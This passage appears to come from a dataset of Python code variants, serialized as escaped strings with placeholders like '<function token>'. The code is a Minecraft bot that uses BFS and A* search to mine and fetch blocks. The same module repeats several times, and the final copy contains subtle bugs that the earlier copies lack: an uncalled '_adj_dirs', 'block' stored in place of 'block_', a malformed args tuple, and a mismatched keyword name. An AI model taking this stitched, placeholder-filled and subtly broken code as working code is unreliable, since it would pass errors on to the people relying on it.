            diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n    def getSuccessors(self, state):\n        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n        for action in state.get_legal_actions(self._block):\n            successor = deepcopy(state)\n            successor.take_action(action)\n
            rtn.append((successor, action, 1))\n        return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n
<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\n
class _GenericBot:\n    <docstring token>\n\n    def __init__(self, pos, inventory=None):\n        \"\"\"Initialize with an empty inventory.\n\n
        inventory is a dictionary. If None, an empty one will be used.\"\"\"\n        if inventory is None:\n            self._inventory = {}\n        else:\n
            self._inventory = deepcopy(inventory)\n        self._pos = deepcopy(pos)\n    <function token>\n\n
    def take_actions(self, actions, seconds=None):\n        \"\"\"Take these actions. 
If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = 
[self._pos, self._pos + _Vec3(0, 1, 0)]\n        for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n            new_loc = loc + dir_\n
            if new_loc not in player and self._get_block(new_loc\n                ) not in non_blocks:\n                return True\n        return False\n    <function token>\n\n
    def _set_block(self, pos, block_):\n        \"\"\"Set a block. block_ is the block id.\"\"\"\n        raise NotImplementedError\n    <function token>\n\n\n
class _ImaginaryBot(_GenericBot):\n    \"\"\"A bot used for finding paths that doesn't actually change blocks\n    in the world.\"\"\"\n\n
    def __init__(self, pos, inventory=None):\n        \"\"\"Create a new bot.\"\"\"\n        _GenericBot.__init__(self, pos, inventory)\n        self._changes = {}\n\n
    def _set_block(self, pos, block_):\n        \"\"\"Set a block. block_ is the block id.\"\"\"\n        self._changes[deepcopy(pos)] = block_\n\n
    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n        if pos in self._changes:\n            return self._changes[pos]\n
        else:\n            return _get_mc().getBlock(pos)\n\n    def get_block(self, pos):\n        \"\"\"The public version.\"\"\"\n        return self._get_block(pos)\n\n
    def __hash__(self):\n        \"\"\"Return the hash.\"\"\"\n        return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n            _key_vals(self._changes)))\n\n\n
class Bot(_GenericBot):\n    \"\"\"The real bot.\n\n    All vector arguments are Vec3s.\"\"\"\n    _BOT_BLOCK = block.IRON_BLOCK.id\n\n
    def __init__(self):\n        \"\"\"Create a bot next to the player.\"\"\"\n        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n
        pos = _Vec3(pos.x, pos.y, pos.z)\n        _GenericBot.__init__(self, pos)\n        self._pos = pos\n        self._move(self._pos)\n\n
    @staticmethod\n    def destroy_all():\n        \"\"\"Destroy all bots within a small distance (in case I forget to\n        destroy one).\"\"\"\n
        player_loc = _player_loc()\n        minec = _get_mc()\n        rad = 10\n        for x in xrange(player_loc.x - rad, player_loc.x + rad):\n
            for y in xrange(player_loc.y - rad, player_loc.y + rad):\n                for z in xrange(player_loc.z - rad, player_loc.z + rad):\n
                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n                        minec.setBlock(x, y, z, _AIR)\n\n
    def destroy(self):\n        \"\"\"Set itself to air.\"\"\"\n        self._set_block(self._pos, _AIR)\n        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n
    def fetch(self, block_name):\n        \"\"\"Mine and return a block to the player.\"\"\"\n        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        block_id = getattr(block, block_name).id\n        block_loc = self._get_block_loc(block_id)\n        mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n
        mine_actions = astar(mine_prob, _mine_heuristic)\n        self.take_actions(mine_actions, _DELAY)\n        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        player_loc = _player_loc()\n        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n        return_actions = astar(return_prob, _return_heuristic)\n
        imag_bot.take_actions(return_actions)\n        return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +\n
            player_loc) / 2,), 'kwargs': {'block_': block_id}})\n        self.take_actions(return_actions, _DELAY)\n\n
    def _get_block_loc(self, block_id):\n        \"\"\"Return the location of the block.\"\"\"\n        find_prob = FindProblem(self._pos, block_id)\n
        dirs = bfs(find_prob)\n        return self._pos + sum(dirs)\n\n    def _set_block(self, pos, block_):\n        \"\"\"Place an actual block in the world.\n\n
        block_ is a block id.\"\"\"\n        _get_mc().setBlock(pos, block_)\n\n    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n
        return _get_mc().getBlock(pos)\n\n    def _move(self, pos):\n        \"\"\"Move there, and set the appropriate blocks.\"\"\"\n
        self._set_block(self._pos, _AIR)\n        self._set_block(self._pos + 
_Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. 
If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the 
bot can place a block at that location\n        independent of what it has in its inventory.\"\"\"\n        non_blocks = [_AIR, _WATER, _LAVA]\n
        player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n        for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n            new_loc = loc + dir_\n
            if new_loc not in player and self._get_block(new_loc\n                ) not in non_blocks:\n                return True\n        return False\n    <function token>\n\n
    def _set_block(self, pos, block_):\n        \"\"\"Set a block. block_ is the block id.\"\"\"\n        raise NotImplementedError\n    <function token>\n\n\n
class _ImaginaryBot(_GenericBot):\n    \"\"\"A bot used for finding paths that doesn't actually change blocks\n    in the world.\"\"\"\n\n
    def __init__(self, pos, inventory=None):\n        \"\"\"Create a new bot.\"\"\"\n        _GenericBot.__init__(self, pos, inventory)\n        self._changes = {}\n\n
    def _set_block(self, pos, block_):\n        \"\"\"Set a block. block_ is the block id.\"\"\"\n        self._changes[deepcopy(pos)] = block_\n\n
    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n        if pos in self._changes:\n            return self._changes[pos]\n
        else:\n            return _get_mc().getBlock(pos)\n\n    def get_block(self, pos):\n        \"\"\"The public version.\"\"\"\n        return self._get_block(pos)\n\n
    def __hash__(self):\n        \"\"\"Return the hash.\"\"\"\n        return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n            _key_vals(self._changes)))\n\n\n
class Bot(_GenericBot):\n    \"\"\"The real bot.\n\n    All vector arguments are Vec3s.\"\"\"\n    _BOT_BLOCK = block.IRON_BLOCK.id\n\n
    def __init__(self):\n        \"\"\"Create a bot next to the player.\"\"\"\n        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n
        pos = _Vec3(pos.x, pos.y, pos.z)\n        _GenericBot.__init__(self, pos)\n        self._pos = pos\n        self._move(self._pos)\n\n
    @staticmethod\n    def destroy_all():\n        \"\"\"Destroy all bots within a small distance (in case I forget to\n        destroy one).\"\"\"\n
        player_loc = _player_loc()\n        minec = _get_mc()\n        rad = 10\n        for x in xrange(player_loc.x - rad, player_loc.x + rad):\n
            for y in xrange(player_loc.y - rad, player_loc.y + rad):\n                for z in xrange(player_loc.z - rad, player_loc.z + rad):\n
                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n                        minec.setBlock(x, y, z, _AIR)\n\n
    def destroy(self):\n        \"\"\"Set itself to air.\"\"\"\n        self._set_block(self._pos, _AIR)\n        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n
    def fetch(self, block_name):\n        \"\"\"Mine and return a block to the player.\"\"\"\n        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        block_id = getattr(block, block_name).id\n        block_loc = self._get_block_loc(block_id)\n        mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n
        mine_actions = astar(mine_prob, _mine_heuristic)\n        self.take_actions(mine_actions, _DELAY)\n        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        player_loc = _player_loc()\n        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n        return_actions = astar(return_prob, _return_heuristic)\n
        imag_bot.take_actions(return_actions)\n        return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +\n
            player_loc) / 2,), 'kwargs': {'block_': block_id}})\n        self.take_actions(return_actions, _DELAY)\n\n
    def _get_block_loc(self, block_id):\n        \"\"\"Return the location of the block.\"\"\"\n        find_prob = FindProblem(self._pos, block_id)\n
        dirs = bfs(find_prob)\n        return self._pos + sum(dirs)\n\n    def _set_block(self, pos, block_):\n        \"\"\"Place an actual block in the world.\n\n
        block_ is a block id.\"\"\"\n        _get_mc().setBlock(pos, block_)\n\n    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n
        return _get_mc().getBlock(pos)\n\n    def 
_move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n 
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
